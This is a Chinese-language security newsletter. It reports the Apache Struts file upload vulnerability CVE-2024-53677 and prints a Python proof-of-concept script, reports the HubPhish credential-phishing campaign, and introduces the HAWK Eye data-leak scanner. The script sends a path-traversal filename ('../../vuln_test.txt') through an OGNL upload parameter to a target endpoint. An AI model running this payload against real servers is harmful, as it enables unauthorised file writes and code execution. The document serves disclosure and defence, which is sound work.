国内外要闻

Apache Struts 文件上传漏洞（CVE - 2024 - 53677）

    近日，Apache Struts 被发现存在文件上传漏洞（CVE - 2024 - 53677），安恒 CERT 评级为 2 级，CVSS3.1 评分为 8.1。

    漏洞危害：若用户未正确配置验证和过滤机制，攻击者可操纵文件上传参数启用路径遍历，利用未授权的上传功能执行恶意代码。需注意，未使用 FileUploadInterceptor 的情况下不受该漏洞影响。

    POC为：

import requests
import argparse
import logging
from urllib.parse import urljoin
from requests_toolbelt.multipart.encoder import MultipartEncoder
import random# 配置日志记录
logging.basicConfig(level=logging.INFO,format="%(asctime)s [%(levelname)s] %(message)s",handlers=[logging.StreamHandler()]
)def detect_vulnerability(target_url, upload_endpoint):"""非破坏性检测CVE - 2024 - 53677漏洞"""logging.info("Starting detection for CVE - 2024 - 53677 (S2 - 067)...")upload_url = urljoin(target_url, upload_endpoint)test_filename = "../../vuln_test.txt"harmless_content = "S2 - 067 detection test."# 尝试使用OGNL绑定覆盖文件名files = {"upload": ("test.txt", harmless_content, "text/plain"),"top.uploadFileName": test_filename  # 尝试覆盖文件名}# 自定义Content - Type边界boundary = "----WebKitFormBoundary" + "".join(random.choices("abcdefghijklmnopqrstuvwxyz0123456789", k=16))m = MultipartEncoder(fields=files, boundary=boundary)headers = {"User - Agent": "Mozilla/5.0","Content - Type": m.content_type}logging.info(f"Sending test request to upload endpoint: {upload_url}")try:# 发送文件上传请求response = requests.post(upload_url, headers=headers, data=m, timeout=10)# 分析HTTP响应if response.status_code == 200:logging.info("[INFO] File upload request succeeded.")if "vuln_test.txt" in response.text:logging.warning("[ALERT] File name overwrite detected. Target may be vulnerable!")else:logging.info("[INFO] Target does not appear vulnerable.")elif response.status_code in [403, 401]:logging.info("[INFO] Access denied. Ensure proper permissions.")else:logging.info(f"[INFO] Unexpected HTTP response: {response.status_code}")except requests.exceptions.RequestException as e:logging.error(f"[ERROR] Request failed: {e}")def main():parser = argparse.ArgumentParser(description="CVE - 2024 - 53677 (S2 - 067) Non - destructive Detection Tool")parser.add_argument("-u", "--url", required=True, help="Target base URL (e.g., http://example.com)")parser.add_argument("--upload_endpoint", required=True, help="Path to file upload endpoint (e.g., /upload.action)")args = parser.parse_args()logging.info("Starting detection process...")detect_vulnerability(args.url, args.upload_endpoint)logging.info("Detection process completed.")if __name__ == "__main__":main()

漏洞靶场

https://github.com/rockmelodies/struts2-vuln-test

HubPhish 利用 HubSpot 工具针对欧洲用户的凭证窃取攻击

    近期，网络安全研究人员披露了一场新的网络钓鱼活动。此次活动以欧洲公司为目标，旨在窃取账户凭证并掌控受害者的微软 Azure 云基础设施。该活动因攻击链中滥用 HubSpot 工具而被 Palo Alto Networks Unit 42 命名为 HubPhish，其目标至少涵盖欧洲 20,000 名汽车、化工和化合物制造行业的用户。

    据安全研究人员 Shachar Roitman、Ohad Benyamin Maimon 和 William Gamazo 在与 The Hacker News 分享的报告中称，该活动的钓鱼尝试在 2024 年 6 月达到顶峰，攻击者利用 HubSpot 免费表单构建器服务创建虚假表单。攻击过程是先发送带有 Docusign 主题诱饵的钓鱼邮件，诱使用户查看文档，随后将用户重定向到恶意的 HubSpot 免费表单构建器链接，接着引导至虚假的 Office 365 Outlook Web App 登录页面以窃取凭证。Unit 42 指出，他们识别出至少 17 个有效的免费表单用于将受害者重定向到不同的威胁行为者控制的域名，其中很大一部分域名托管在 “.buzz” 顶级域名上，且该钓鱼活动通过包括 Bulletproof VPS 主机在内的各种服务进行托管，威胁行为者还利用此基础设施在账户接管操作期间访问受感染的微软 Azure 租户。成功获取账户访问权限后，攻击者会在账户下添加其控制的新设备以建立持久性。

    与此同时，攻击者还被发现通过在钓鱼邮件中冒充 SharePoint，传播名为 XLoader（Formbook 的后继者）的信息窃取恶意软件家族。此外，钓鱼攻击正不断寻找新方法来绕过电子邮件安全措施，如滥用谷歌日历和谷歌绘图等合法服务，以及假冒 Proofpoint、Barracuda Networks、Mimecast 和 Virtru 等电子邮件安全提供商品牌。利用与谷歌服务相关信任的攻击方式是发送包含日历（.ICS）文件及谷歌表单或谷歌绘图链接的电子邮件，用户点击链接后会被提示点击另一个通常伪装成 reCAPTCHA 或支持按钮的链接，一旦点击，受害者就会被转发到实施金融诈骗的虚假页面。为此，建议用户启用谷歌日历中的 “已知发件人” 设置以防范此类钓鱼攻击。网络安全形势日益严峻，各方需提高警惕，加强防范措施以应对不断变化的网络威胁。

知识分享

HAWK Eye—— 多平台数据安全检测利器

    在当今数字化时代，数据安全面临着前所未有的挑战。HAWK Eye 这款强大的命令行工具应运而生，致力于防范数据泄露与网络威胁。

    HAWK Eye 能够快速扫描多种数据源，包括 S3、MySQL、PostgreSQL、MongoDB、CouchDB、Google Drive、Slack、Redis、Firebase、文件系统以及 Google Cloud buckets（GCS）等，精准查找个人可识别信息（PII）和机密信息。它运用先进的文本分析与光学字符识别（OCR）技术，深入挖掘诸如 docx、xlsx、pptx、pdf、图像（jpg、png、gif）、压缩文件（zip、tar、rar）甚至视频文件等各类文档格式，确保在不同平台上提供全面的保护。

    其安装方式多样，可通过 pip 或 pip3 轻松安装，如 “pip3 install hawk-scanner”。使用 Docker hub 也是便捷之选，只需按照特定命令挂载配置文件并运行相应指令即可。当然，也能使用 HAWK Eye 二进制文件，还可将其导入自己的 Python 脚本和工作流程，以获取更高的灵活性。例如，在 Python 脚本中可通过 “from hawk_scanner.internals import system; pii = system.scan_file ("/Users/kumarohit/Downloads/Resume.pdf"); print (pii)” 这样的代码来扫描文件。

    HAWK Eye 具备众多关键特性。它能迅速扫描多数据源中的 PII 数据与恶意软件暴露风险，其先进算法和深度扫描能力可进行全面的安全审计。借助 Slack 等集成功能，能实时发出警报与通知，让用户及时知晓潜在的数据漏洞，并且未来还会有更多集成。新的命令支持 S3、MySQL、PostgreSQL、Redis、Firebase、文件系统和 GCS 等，进一步拓展了工具的功能范围。“--debug” 标志可打印所有调试输出，便于全面排查故障；“--json” 标志能将输出保存为 JSON 格式并指定文件名。这款工具在设计上还融入了爱与幽默，让用户在数据安全之旅中享受轻松愉悦的体验。

    在使用方面，若不提供特定命令，默认会运行所有命令（firebase、fs、gcs、mysql、text、couchdb、gdrive、gdrive workspace、slack、postgresql、redis、s3）。同时，它提供了丰富的选项，如 “firebase” 可扫描 Firebase 配置文件中的 PII 和机密数据，“fs” 用于扫描文件系统配置文件等，还可通过 “--connection” 指定连接 YAML 本地文件路径，“--fingerprint” 提供指纹文件路径等。

    配置 HAWK Eye 连接时，需使用 YAML 文件存储各种数据源的连接配置文件（connection.yml），该文件位于 config 目录。用户可根据需求添加或删除配置文件中的数据源配置，若无需扫描全部数据源，也可仅配置部分数据源。

    此外，HAWK Eye 的扩展性允许开发者贡献新的安全命令。开发者可通过在 GitHub 上 fork 仓库，在 commands 目录创建新的 Python 文件并定义执行函数，提供清晰文档与注释，测试命令后提交 pull request 等步骤来添加新命令。同时，开源社区也可通过遵循贡献指南来为提升 HAWK Eye 保障数据源安全的能力贡献力量，包括遵循编码标准、编写清晰的提交消息、包含合适的测试用例以及更新 README.md 文件等步骤。

    HAWK Eye 曾在 Black Hat SecTor 2023、Black Hat Middle East and Africa 2023、Black Hat Europe 2023 等会议上亮相。